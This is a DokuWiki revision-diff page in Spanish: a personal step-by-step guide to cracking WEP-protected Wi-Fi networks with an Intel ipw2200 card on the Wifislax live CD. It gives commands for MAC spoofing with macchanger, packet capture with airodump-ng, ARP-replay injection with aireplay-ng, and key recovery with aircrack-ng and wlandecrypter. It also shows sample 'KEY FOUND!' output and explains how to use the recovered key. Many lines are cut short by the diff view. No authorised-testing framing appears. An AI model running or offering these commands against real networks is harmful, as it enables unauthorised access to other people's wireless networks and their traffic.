informatica:linux:wifi:crackear_redes:ipw2200
Differences
This shows you the differences between two versions of the page.
| Next revision | Previous revision | ||
| informatica:linux:wifi:crackear_redes:ipw2200 [2009/04/15 13:29] – creado 194.179.83.89 | informatica:linux:wifi:crackear_redes:ipw2200 [2015/04/13 20:19] (current) – external edit 127.0.0.1 | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| redes red wifi wireless iwconfig rtap0 wifislax ipw2200 airodump aircrack | redes red wifi wireless iwconfig rtap0 wifislax ipw2200 airodump aircrack | ||
| - | 1. Ver las interfaces | + | 1. Arrancar con el cd [[http:// |
| + | |||
| + | 2. Seleccionar la primera opción, entorno gráfico | ||
| + | |||
| + | 3. Teclear usuario y contraseña: | ||
| + | |||
| + | root | ||
| + | toor | ||
| + | |||
| + | 4. Abrir una consola (se recomienda abrir una consola por comando) | ||
| + | |||
| + | 5. Ver las interfaces | ||
| iwconfig -a | iwconfig -a | ||
| Line 10: | Line 21: | ||
| rtap0 => interfaz wifi lista para inyectar | rtap0 => interfaz wifi lista para inyectar | ||
| | | ||
| - | 2. Rastrear las redes a nuestro alcance: | + | 6. Rastrear las redes a nuestro alcance: |
| iwlist ethx scan | iwlist ethx scan | ||
| | | ||
| - | Para una red dada es importante quedarse con el nombre (ESSID), la MAC (BSID) y el canal | + | Para una red dada es importante quedarse con el nombre (ESSID), la MAC (BSSID) y el canal |
| - | 3. Por si las moscas levantar las dos interfaces: | + | 7. Por si las moscas levantar las dos interfaces: |
| ifconfig ethx up && ifconfig rtap0 up | ifconfig ethx up && ifconfig rtap0 up | ||
| | | ||
| - | 4. | + | 8. Cambiar la mac (en el ejemplo le ponemos 00: |
| + | |||
| + | macchanger -m 00: | ||
| + | |||
| + | 9. Lanzar los siguientes comandos (no sé exactamente lo que hacen): | ||
| + | |||
| + | iwconfig eth3 essid " | ||
| + | airodump-ng -c 6 -b mac_del_ap -w captura_ESSID rtap0 | ||
| + | aireplay-ng -3 -x 1024 -g 1000000 -b BSSID -h 00: | ||
| + | |||
| + | 10. **OPCIONAL** | ||
| + | |||
| + | Habida cuenta que el equipo se puede quedar tostado, o se puede ir la luz, es conveniente programar una tarea en cron que grabe cada minuto el fichero .cap que almacena las capturas en un llavero usb o bien en el propio disco duro del pc/ | ||
| + | |||
| + | 11.1 Crear el guión: | ||
| + | |||
| + | nano / | ||
| + | |||
| + | 11.2 Contenido (OJO, comprobad las rutas): | ||
| + | |||
| + | |||
| + | < | ||
| + | # | ||
| + | |||
| + | # Ejemplo para un disco duro | ||
| + | cp /root/*cap / | ||
| + | # Ejemplo para un llavero usb | ||
| + | cp /root/*cap / | ||
| + | </ | ||
| + | |||
| + | 11.3 Grabar y cerrar | ||
| + | |||
| + | 11.4 Darle permisos de ejecución: | ||
| + | |||
| + | chmod +x / | ||
| + | |||
| + | 11.5 Programar la tarea en cron: | ||
| + | |||
| + | crontab -e | ||
| + | |||
| + | 11.6 Añadir la siguiente linea (OJO, comprobad las rutas): | ||
| + | |||
| + | **Revisar**, | ||
| + | |||
| + | * * * * * / | ||
| + | |||
| + | 11.7 Grabar y salir | ||
| + | |||
| + | 12. **OPCIONAL** | ||
| + | |||
| + | Existe una aplicación, | ||
| + | |||
| + | 12.1 Teclear en una consola el siguiente comando: | ||
| + | |||
| + | wlandecrypter BSSID ESSID / | ||
| + | |||
| + | Si el comando nos lanza un error, significa que la dirección MAC del router (BSSID) no está ' | ||
| + | |||
| + | 13. **OPCIONAL** | ||
| + | |||
| + | Si pasamos el fichero / | ||
| + | |||
| + | 13.1 Instalar aircrack-ng | ||
| + | |||
| + | aptitude install aircrack-ng | ||
| + | |||
| + | 14. Hay que estar al loro de la salida del comando ' | ||
| + | |||
| + | Cuando queramos intentar sacar la contraseña, | ||
| + | |||
| + | Si hemos podido generar un diccionario en el paso 12: | ||
| + | |||
| + | aircrack-ng -w / | ||
| + | |||
| + | En caso contrario: | ||
| + | |||
| + | aircrack-ng -w / | ||
| + | |||
| + | Si tenemos suerte, aparecerá el siguiente mensaje: | ||
| + | |||
| + | < | ||
| + | KEY FOUND! [ 43: | ||
| + | Decrypted correctly: 100% | ||
| + | </ | ||
| + | |||
| + | Es **MUY** recomendable pasar el fichero .cap a un pc con aircrack-ng instalado (ver paso 13), pues de ese modo se obtiene la clave en unos pocos segundos | ||
| + | |||
| + | Postdata: Yo en clientes windows, le he metido la clave alfanumérica sin los dos puntos. En el ejemplo anterior, el valor introducido sería: | ||
| + | |||
| + | 43303031443230334435443131 | ||
| + | |||
| + | |||
informatica/linux/wifi/crackear_redes/ipw2200.1239802199.txt.gz · Last modified: (external edit)
